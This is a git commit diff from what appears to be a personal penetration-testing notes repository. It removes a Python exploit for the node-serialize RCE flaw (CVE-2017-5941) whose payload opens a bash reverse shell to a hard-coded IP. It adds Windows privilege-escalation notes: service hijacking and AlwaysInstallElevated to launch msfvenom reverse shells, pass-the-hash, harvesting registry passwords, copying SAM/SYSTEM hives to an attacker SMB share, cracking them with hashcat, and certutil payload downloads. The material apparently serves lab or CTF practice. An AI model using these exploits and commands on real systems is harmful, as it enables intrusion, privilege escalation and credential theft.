bump
This commit is contained in:
parent
2c02116916
commit
b35bcc5560
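--- a/49552.py
+++ b/49552.py
@@ -1,47 +0,0 @@
-# Exploit Title: Node.JS - 'node-serialize' Remote Code Execution (2)
-# Exploit Author: UndeadLarva
-# Software Link: https://www.npmjs.com/package/node-serialize
-# Version: 0.0.4
-# CVE: CVE-2017-5941
-
-import requests
-import re
-import base64
-import sys
-
-url = 'http://10.10.216.3/' # change this
-
-payload = ("require('http').ServerResponse.prototype.end = (function (end) {"
-"return function () {"
-"['close', 'connect', 'data', 'drain', 'end', 'error', 'lookup', 'timeout', ''].forEach(this.socket.removeAllListeners.bind(this.socket));"
-"console.log('still inside');"
-"const { exec } = require('child_process');"
-"exec('bash -i >& /dev/tcp/10.9.7.193/4448 0>&1');" # change this
-"}"
-"})(require('http').ServerResponse.prototype.end)")
-
-# rce = "_$$ND_FUNC$$_process.exit(0)"
-#code ="_$$ND_FUNC$$_console.log('behind you')"
-#code = "_$$ND_FUNC$$_" + "function(){ require('child_process').exec('ls /', function(error, stdout, stderr) { console.log(stdout) });}"
-#code = "_$$ND_FUNC$$_" + payload
-
-code = "_$$ND_FUNC$$_console.log(1)()"
-#code = "_$$ND_FUNC$$_require('child_process').exec('ls /', function(error, stdout, stderr) { console.log(stdout) });()"
-#string = '{"username":"TheUndead","country":"worldwide","city":"Tyr", "exec": "'+code+'"}'
-#code = "return function(){exec('bash -i >& /dev/tcp/10.9.7.193/4448 0>&1')}();" # change this
-code = "return function(){exec('bash -i >& /dev/tcp/10.9.7.193/4448 0>&1')}();"
-string = '{"email": "'+code+'"}'
-
-print code
-
-cookie = {'session':base64.b64encode(string)}
-
-response = requests.post(url+"?email="+code).text
-print response
-
-#try:
-# response = requests.get(url, cookies=cookie).text
-# print response
-#except requests.exceptions.RequestException as e:
-# print('Oops!')
-# sys.exit(1)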
@ -89,9 +89,28 @@ regjump HKLM
|
|||
```
|
||||
reg query HKLM
|
||||
```
|
||||
```
|
||||
Get-Item
|
||||
Get-ItemProperty
|
||||
```
|
||||
|
||||
## Strings
|
||||
Strings just scans the file you pass it for UNICODE (or ASCII) strings of a default length of 3 or more UNICODE (or ASCII) characters.
|
||||
|
||||
## Create a system authority shell
|
||||
1. Check permissons
|
||||
```sh
|
||||
accesschk.exe /accepteula -uwcqv user <serviceName>
|
||||
```
|
||||
2. Query service
|
||||
```sh
|
||||
sq qc <service>
|
||||
```
|
||||
3. Set service config to the msfvenom reverse shell, uploaded previously.
|
||||
```
|
||||
sc config daclsvc binpath= "\"C:\shell.exe""
|
||||
```
|
||||
4. Start service and gain high priv shell
|
||||
```sh
|
||||
net start daclsvc
|
||||
```
|
||||
|
|
|
@ -0,0 +1,17 @@
|
|||
# AlwaysInstalledElevated
|
||||
|
||||
* Watch out for `AlwaysInstalledElevated` keys inside the registry via
|
||||
```sh
|
||||
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
|
||||
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
|
||||
```
|
||||
* Prepare reverse shell on attacker as an msi file
|
||||
```
|
||||
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<attacker-IP> LPORT=<attacker-Port> -f msi -o shell.msi
|
||||
```
|
||||
* start the msi on target
|
||||
```sh
|
||||
msiexec /quiet /qn /i C:\shell.msi
|
||||
```
|
||||
|
||||
|
|
@ -0,0 +1,7 @@
|
|||
# Pass the Hash
|
||||
|
||||
* Authenticate with retrieved hash
|
||||
* User evil-winrm or
|
||||
```
|
||||
pth-winexe -U 'admin%hash' //<target-IP> cmd.exe
|
||||
```
|
|
@ -0,0 +1,25 @@
|
|||
# Password Inside Registry Key
|
||||
|
||||
* Query passwords saved inside the registry
|
||||
```sh
|
||||
reg query HKLM /f password /t REG_SZ /s
|
||||
```
|
||||
* Admin Autologon credentials
|
||||
```
|
||||
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon"
|
||||
```
|
||||
* On attacker, change the credentials on target
|
||||
```sh
|
||||
winexe -U 'admin%password' //<target-IP> cmd.exe
|
||||
```
|
||||
|
||||
## List other Creds
|
||||
```
|
||||
cmdkey /list
|
||||
```
|
||||
* Open reverse shell
|
||||
```sh
|
||||
runas /savecred /user:admin C:\shell.exe
|
||||
```
|
||||
|
||||
|
|
@ -0,0 +1,7 @@
|
|||
# Potatoes
|
||||
|
||||
* [Hot Potato](https://foxglovesecurity.com/2016/01/16/hot-potato/)
|
||||
* [Rotten Potato](https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/)
|
||||
* [Lonely Potato](https://decoder.cloud/2017/12/23/the-lonely-potato/)
|
||||
* [Juicy Potato](https://ohpe.it/juicy-potato/)
|
||||
* [Rogue Potato](https://decoder.cloud/2020/05/11/no-more-juicypotato-old-story-welcome-roguepotato/)
|
|
@ -0,0 +1,13 @@
|
|||
# Unquoted Path
|
||||
|
||||
* Path to a service without quotes can be hijacked by inserting other executables and services into the path.
|
||||
* Some part of path has to be writeable.
|
||||
## Example
|
||||
* The unqoted path is `C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe`
|
||||
```sh
|
||||
copy C:\shell.exe "C:\Program Files\Unquoted Path Service\Common.exe"
|
||||
```
|
||||
```sh
|
||||
net start <service>
|
||||
```
|
||||
|
|
@ -6,3 +6,19 @@ save HKLM\SAM C:\Users\Administrator\Desktop\SAM
|
|||
save HKLM\SAM C:\Users\Administrator\Desktop\System
|
||||
```
|
||||
* Use `samdump2`
|
||||
|
||||
## Extract Hashes
|
||||
* Extract via smb server on attacker
|
||||
```
|
||||
copy C:\Windows\Repair\SAM \\<attacker-IP>\dir\
|
||||
copy C:\Windows\Repair\SYSTEM \\<attacker-IP>\dir\
|
||||
```
|
||||
* Crack via [creddump7](git clone https://github.com/Tib3rius/creddump7)
|
||||
```
|
||||
python pwdump.py SYSTEM SAM
|
||||
```
|
||||
or
|
||||
```
|
||||
hashcat -m 1000 --force <hash> /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
|
||||
```
|
||||
|
||||
|
|
|
@ -20,7 +20,7 @@ msfvenom -p <payload> <options>
|
|||
## Windows
|
||||
### x64 Reverse Shell in exe format
|
||||
```
|
||||
msfvenom -p windows/x64/shell/reverse_tcp -f exe -o shell.exe LHOST=<listen-IP> LPORT=<listen-port>
|
||||
msfvenom -p windows/x64/shell_reverse_tcp -f exe -o shell.exe LHOST=<listen-IP> LPORT=<listen-port>
|
||||
```
|
||||
|
||||
### x86 shikata_ga_nai
|
||||
|
@ -51,6 +51,15 @@ or on cmd.exe
|
|||
```sh
|
||||
certutil -urlcache -split -f http://<attacker-IP>:<attacker-Port>/shell.exe
|
||||
```
|
||||
* Using SMB
|
||||
On attacker
|
||||
```sh
|
||||
sudo python impacket/examples/smbserver.py dir .
|
||||
```
|
||||
on target
|
||||
```sh
|
||||
copy \\<attacker-IP>\dir\shell.exe C:\shell.exe
|
||||
```
|
||||
|
||||
## Unix
|
||||
### netcat reverse
|
||||
|
|